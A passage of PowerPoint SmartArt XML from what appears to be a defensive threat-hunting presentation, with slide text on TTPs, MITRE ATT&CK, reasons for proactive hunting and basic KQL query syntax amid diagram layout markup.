    <dgm:pt modelId="{EE6B4AD4-77EE-4EFB-98B7-D7072311DF1A}" type="sibTrans" cxnId="{B884407A-32AC-43D3-A623-DC185652A961}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C71978B0-E031-480B-86CD-96E9C61B99D6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-AU"/>
            <a:t>The security community refers to “TTPs” as the general tactics and techniques that threat actors employ</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{77CDC50D-EF9A-47EE-BCFD-637A96337815}" type="parTrans" cxnId="{B23E5CDE-D2D1-499B-811E-DDD383483182}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{322B60C1-AD6B-4133-B545-0B81FBBD2E80}" type="sibTrans" cxnId="{B23E5CDE-D2D1-499B-811E-DDD383483182}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BEF99D5E-4B46-4C9A-8EB1-D22FFA527064}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-AU"/>
            <a:t>Tracking what an actor’s broader tactics are, instead of the exact tools they use, is more useful</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CE56CCFD-7AEE-47EB-859A-A6B5CD843271}" type="parTrans" cxnId="{0727E811-9E84-46EE-92F4-177486240386}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{77790D92-0221-4303-8788-33EFAD3251EB}" type="sibTrans" cxnId="{0727E811-9E84-46EE-92F4-177486240386}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{78F29D4E-F634-4432-B649-4C73EE30ECF4}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-AU"/>
            <a:t>MITRE ATT&amp;CK is still just a means of tracking behaviour though – it is based on threat intelligence, which is based on known attacks. All of this takes time.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5F2BCDB5-37D3-4865-A7CE-8A9B7EB7B8FC}" type="parTrans" cxnId="{3B8A3219-7627-427A-83B3-FBECD4249B72}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{D6BC579E-614D-41ED-A435-67F30B2791F8}" type="sibTrans" cxnId="{3B8A3219-7627-427A-83B3-FBECD4249B72}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{20068857-D852-4AA6-8E90-7DE303D50FF8}" type="pres">
      <dgm:prSet presAssocID="{44260CEE-527A-4EC3-97A8-1043F80F9238}" presName="linear" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{79224956-759F-452A-8C2C-CA971BE5EA2C}" type="pres">
      <dgm:prSet presAssocID="{36E21C37-57B1-4802-98BA-B7461655ECBC}" presName="parentText" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{56282672-8F2A-4553-98BD-D319240C88A6}" type="pres">
      <dgm:prSet presAssocID="{EE6B4AD4-77EE-4EFB-98B7-D7072311DF1A}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{25C867CA-B4F0-4A76-98D9-99D995A306E5}" type="pres">
      <dgm:prSet presAssocID="{C71978B0-E031-480B-86CD-96E9C61B99D6}" presName="parentText" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{65F52115-4E42-4DA0-B505-BECD1709E96C}" type="pres">
      <dgm:prSet presAssocID="{322B60C1-AD6B-4133-B545-0B81FBBD2E80}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{2EFF0F07-7D62-4466-B1BC-255A922ED20A}" type="pres">
      <dgm:prSet presAssocID="{BEF99D5E-4B46-4C9A-8EB1-D22FFA527064}" presName="parentText" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{624E468C-97DC-4FD1-9F8F-3BF1DD4F5277}" type="pres">
      <dgm:prSet presAssocID="{77790D92-0221-4303-8788-33EFAD3251EB}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{71510EB2-E65E-4F7D-9283-5817FF52C9C3}" type="pres">
      <dgm:prSet presAssocID="{78F29D4E-F634-4432-B649-4C73EE30ECF4}" presName="parentText" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="4">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{0727E811-9E84-46EE-92F4-177486240386}" srcId="{44260CEE-527A-4EC3-97A8-1043F80F9238}" destId="{BEF99D5E-4B46-4C9A-8EB1-D22FFA527064}" srcOrd="2" destOrd="0" parTransId="{CE56CCFD-7AEE-47EB-859A-A6B5CD843271}" sibTransId="{77790D92-0221-4303-8788-33EFAD3251EB}"/>
    <dgm:cxn modelId="{3B8A3219-7627-427A-83B3-FBECD4249B72}" srcId="{44260CEE-527A-4EC3-97A8-1043F80F9238}" destId="{78F29D4E-F634-4432-B649-4C73EE30ECF4}" srcOrd="3" destOrd="0" parTransId="{5F2BCDB5-37D3-4865-A7CE-8A9B7EB7B8FC}" sibTransId="{D6BC579E-614D-41ED-A435-67F30B2791F8}"/>
    <dgm:cxn modelId="{C5FB372A-3B9C-460C-BFEB-F89CC7BD08A1}" type="presOf" srcId="{C71978B0-E031-480B-86CD-96E9C61B99D6}" destId="{25C867CA-B4F0-4A76-98D9-99D995A306E5}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{ABF5323C-FE7D-4060-9094-FABFD9D39745}" type="presOf" srcId="{36E21C37-57B1-4802-98BA-B7461655ECBC}" destId="{79224956-759F-452A-8C2C-CA971BE5EA2C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{8EE11E67-B7F0-4DEE-A62E-55B58FC2CF9B}" type="presOf" srcId="{78F29D4E-F634-4432-B649-4C73EE30ECF4}" destId="{71510EB2-E65E-4F7D-9283-5817FF52C9C3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{B884407A-32AC-43D3-A623-DC185652A961}" srcId="{44260CEE-527A-4EC3-97A8-1043F80F9238}" destId="{36E21C37-57B1-4802-98BA-B7461655ECBC}" srcOrd="0" destOrd="0" parTransId="{222ED456-CC8F-4AFC-9FE7-136F994665E4}" sibTransId="{EE6B4AD4-77EE-4EFB-98B7-D7072311DF1A}"/>
    <dgm:cxn modelId="{ED164CAE-3578-491E-B7BD-0C72F466D515}" type="presOf" srcId="{44260CEE-527A-4EC3-97A8-1043F80F9238}" destId="{20068857-D852-4AA6-8E90-7DE303D50FF8}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{B23E5CDE-D2D1-499B-811E-DDD383483182}" srcId="{44260CEE-527A-4EC3-97A8-1043F80F9238}" destId="{C71978B0-E031-480B-86CD-96E9C61B99D6}" srcOrd="1" destOrd="0" parTransId="{77CDC50D-EF9A-47EE-BCFD-637A96337815}" sibTransId="{322B60C1-AD6B-4133-B545-0B81FBBD2E80}"/>
    <dgm:cxn modelId="{C06AC9FA-484A-4F89-9FB8-C2D42124C747}" type="presOf" srcId="{BEF99D5E-4B46-4C9A-8EB1-D22FFA527064}" destId="{2EFF0F07-7D62-4466-B1BC-255A922ED20A}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{75F32545-40CC-4E9A-A551-43BB0C4F868C}" type="presParOf" srcId="{20068857-D852-4AA6-8E90-7DE303D50FF8}" destId="{79224956-759F-452A-8C2C-CA971BE5EA2C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{7A60AC7B-83D0-4CF5-B7C7-3F5B90439D62}" type="presParOf" srcId="{20068857-D852-4AA6-8E90-7DE303D50FF8}" destId="{56282672-8F2A-4553-98BD-D319240C88A6}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{800AC4BE-8F1E-449C-B879-584DBB27CF8F}" type="presParOf" srcId="{20068857-D852-4AA6-8E90-7DE303D50FF8}" destId="{25C867CA-B4F0-4A76-98D9-99D995A306E5}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{2ACC7C74-450B-4F4C-8938-E1EE4B765CD4}" type="presParOf" srcId="{20068857-D852-4AA6-8E90-7DE303D50FF8}" destId="{65F52115-4E42-4DA0-B505-BECD1709E96C}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{708A23D1-F65D-4AA4-BB03-99B878940246}" type="presParOf" srcId="{20068857-D852-4AA6-8E90-7DE303D50FF8}" destId="{2EFF0F07-7D62-4466-B1BC-255A922ED20A}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{72B333D1-37D3-475A-919A-527EE7426A0F}" type="presParOf" srcId="{20068857-D852-4AA6-8E90-7DE303D50FF8}" destId="{624E468C-97DC-4FD1-9F8F-3BF1DD4F5277}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList2"/>
    <dgm:cxn modelId="{A61FEA33-F82D-4EC1-8CA8-D751BC48B160}" type="presParOf" srcId="{20068857-D852-4AA6-8E90-7DE303D50FF8}" destId="{71510EB2-E65E-4F7D-9283-5817FF52C9C3}"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73487-93E4-47B6-AB80-4B88A86DC0AE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="6589693" y="-2661723"/>
          <a:ext cx="1121829" cy="6729984"/>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AU" sz="1800" kern="1200" dirty="0"/>
            <a:t>Automated tools are no guarantee an advanced attacker is not in your environment</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="3785616" y="197117"/>
        <a:ext cx="6675221" cy="1012303"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{868483F8-8CC7-4D56-9A3C-B6D9A228A332}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2124"/>
          <a:ext cx="3785616" cy="140228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AU" sz="2100" kern="1200"/>
            <a:t>Evading automated tools should be considered </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" sz="2100" u="sng" kern="1200"/>
            <a:t>trivial</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" sz="2100" kern="1200"/>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2100" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="68454" y="70578"/>
        <a:ext cx="3648708" cy="1265378"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E345A7BA-D873-43ED-AA2D-F55E3960711F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="6589693" y="-1189323"/>
          <a:ext cx="1121829" cy="6729984"/>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AU" sz="1800" kern="1200" dirty="0"/>
            <a:t>E.g. Critical infrastructure (energy, telecommunications), financial services, large and highly profitable organisations (Medibank, Casinos)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="3785616" y="1669517"/>
        <a:ext cx="6675221" cy="1012303"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{75778759-C99A-471B-8C90-6C2C0A0EF0E7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1474525"/>
          <a:ext cx="3785616" cy="140228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AU" sz="2100" kern="1200"/>
            <a:t>Proactive hunting is often done in organisations that are at risk from Advanced Persistent Threats (APTs)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2100" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="68454" y="1542979"/>
        <a:ext cx="3648708" cy="1265378"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{76CEB6C0-87E8-44AC-A93F-A19143169660}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="6589693" y="283077"/>
          <a:ext cx="1121829" cy="6729984"/>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AU" sz="1800" kern="1200" dirty="0"/>
            <a:t>Out of concern that the security tools have missed some of an attacker’s activity or can’t see it in some places</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
          <a:pPr marL="171450" lvl="1" indent="-171450" algn="l" defTabSz="800100">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-AU" sz="1800" kern="1200"/>
            <a:t>Threat hunting is not an IoC sweep e.g. IP addresses/hashes only</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="3785616" y="3141918"/>
        <a:ext cx="6675221" cy="1012303"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7DF37FDD-C166-4BE8-ABB7-18FAE9B82B08}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2946926"/>
          <a:ext cx="3785616" cy="140228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AU" sz="2100" kern="1200"/>
            <a:t>A security incident may also trigger a threat hunt</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2100" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="68454" y="3015380"/>
        <a:ext cx="3648708" cy="1265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941101-FEBD-4370-8B0B-F1FE04BF945E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4802" y="447117"/>
          <a:ext cx="2099658" cy="2795170"/>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a:t>First, make sure that your cluster is selected in the sidebar</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="66299" y="508614"/>
        <a:ext cx="1976664" cy="2672176"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C56191A7-CEB1-4B79-84E0-C777FE9C6DD1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2314426" y="1584344"/>
          <a:ext cx="445127" cy="520715"/>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314426" y="1688487"/>
        <a:ext cx="311589" cy="312429"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{70B4470F-ACEC-4C5E-AA80-81A8B8E116C1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2944324" y="447117"/>
          <a:ext cx="2099658" cy="2795170"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent4">
            <a:hueOff val="2199979"/>
            <a:satOff val="-9734"/>
            <a:lumOff val="-163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t>A KQL query starts with a table name and is then followed by any filters. By default, running this will show the maximum data possible, which may cause errors.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3005821" y="508614"/>
        <a:ext cx="1976664" cy="2672176"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{937B36A4-9B58-4FA0-8827-1EBB1DE4C60A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5253948" y="1584344"/>
          <a:ext cx="445127" cy="520715"/>
        </a:xfrm>
        <a:prstGeom prst="rightArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 60000"/>
            <a:gd name="adj2" fmla="val 50000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent4">
            <a:hueOff val="3299968"/>
            <a:satOff val="-14601"/>
            <a:lumOff val="-245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253948" y="1688487"/>
        <a:ext cx="311589" cy="312429"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6DDB5530-8C47-43A1-B2AD-3322D5804479}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5883846" y="447117"/>
          <a:ext cx="2099658" cy="2795170"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent4">
            <a:hueOff val="4399958"/>
            <a:satOff val="-19468"/>
            <a:lumOff val="-326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a:t>Start with your new table and get the first 1000 rows like this:</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-AU" sz="1800" kern="1200"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-AU" sz="1800" kern="1200"/>
            <a:t>TableName</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-AU" sz="1800" kern="1200"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-AU" sz="1800" kern="1200"/>
            <a:t>| take 1000</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5945343" y="508614"/>
        <a:ext cx="1976664" cy="2672176"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9BDFE564-DEB1-4B9F-8E53-3DD727AF27A7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8193470" y="1584344"/>
          <a:ext cx="445127" cy="520715"/>
        </a:xfrm>
        <a:prstGeom prst="rightArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 60000"/>
            <a:gd name="adj2" fmla="val 50000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent4">
            <a:hueOff val="6599937"/>
            <a:satOff val="-29202"/>
            <a:lumOff val="-49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193470" y="1688487"/>
        <a:ext cx="311589" cy="312429"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{80CF6733-AB7E-4659-B4FD-1C77A36087CE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="8823368" y="447117"/>
          <a:ext cx="2099658" cy="2795170"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent4">
            <a:hueOff val="6599937"/>
            <a:satOff val="-29202"/>
            <a:lumOff val="-49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a:t>We can also filter data using </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" sz="1800" i="1" kern="1200"/>
            <a:t>where</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" sz="1800" kern="1200"/>
            <a:t>, followed by any filters:</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-AU" sz="1800" kern="1200"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-AU" sz="1800" kern="1200"/>
            <a:t>TableName</a:t>
          </a:r>
          <a:br>
            <a:rPr lang="en-AU" sz="1800" kern="1200"/>
          </a:br>
          <a:r>
            <a:rPr lang="en-AU" sz="1800" kern="1200"/>
            <a:t>| where SomeColumn == “127.0.0.1” or Col2 contains “BLUECON”</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="8884865" y="508614"/>
        <a:ext cx="1976664" cy="26721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A12BA2-D08A-49F6-A34A-DA26DC4B1049}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3414" y="952171"/>
          <a:ext cx="3329572" cy="1331829"/>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AU" sz="1700" kern="1200" dirty="0"/>
            <a:t>Our queries should be as broad as possible, whilst staying </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" sz="1700" i="1" kern="1200" dirty="0"/>
            <a:t>precise</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3414" y="952171"/>
        <a:ext cx="3329572" cy="1331829"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{558F2750-E977-4073-AFF2-5A0D7242ADEF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3414" y="2284000"/>
          <a:ext cx="3329572" cy="95663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AU" sz="1700" kern="1200" dirty="0"/>
            <a:t>Ideally we get both, if we have elements with strong </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" sz="1700" i="1" kern="1200" dirty="0"/>
            <a:t>uniqueness</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" sz="1700" kern="1200" dirty="0"/>
            <a:t> in our query</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3414" y="2284000"/>
        <a:ext cx="3329572" cy="956632"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B93F8D26-7DEE-4EFE-864D-4E7AF901A793}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3799128" y="952171"/>
          <a:ext cx="3329572" cy="1331829"/>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AU" sz="1700" kern="1200" dirty="0"/>
            <a:t>Never risk missing anything by requiring a match for something that is not an </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" sz="1700" i="1" kern="1200" dirty="0"/>
            <a:t>invariant</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-AU" sz="1700" kern="1200" dirty="0"/>
            <a:t> for the activity of concern</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3799128" y="952171"/>
        <a:ext cx="3329572" cy="1331829"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{719046D4-7760-4250-9BB1-D00A04A1540D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3799128" y="2284000"/>
          <a:ext cx="3329572" cy="95663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AU" sz="1700" kern="1200" dirty="0"/>
            <a:t>No matter how much it is a unique signal of malicious activity!</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3799128" y="2284000"/>
        <a:ext cx="3329572" cy="956632"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A91E23FD-CD1F-414C-A62B-85E9A2618ED1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7594841" y="952171"/>
          <a:ext cx="3329572" cy="1331829"/>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AU" sz="1700" kern="1200" dirty="0"/>
            <a:t>Ultimately, we want to make sure we don’t hunt for individual bits of activity, but the families of activity that the evidence is an example of, wherever possible</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1700" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7594841" y="952171"/>
        <a:ext cx="3329572" cy="1331829"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{16EC0451-074C-436C-AFD6-6F0CFF900993}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7594841" y="2284000"/>
          <a:ext cx="3329572" cy="95663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AU" sz="1800" kern="1200" dirty="0"/>
            <a:t>But it can get hard</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7594841" y="2284000"/>
        <a:ext cx="3329572" cy="9566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24956-759F-452A-8C2C-CA971BE5EA2C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="278095"/>
          <a:ext cx="6666833" cy="1179072"/>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AU" sz="2100" kern="1200" dirty="0"/>
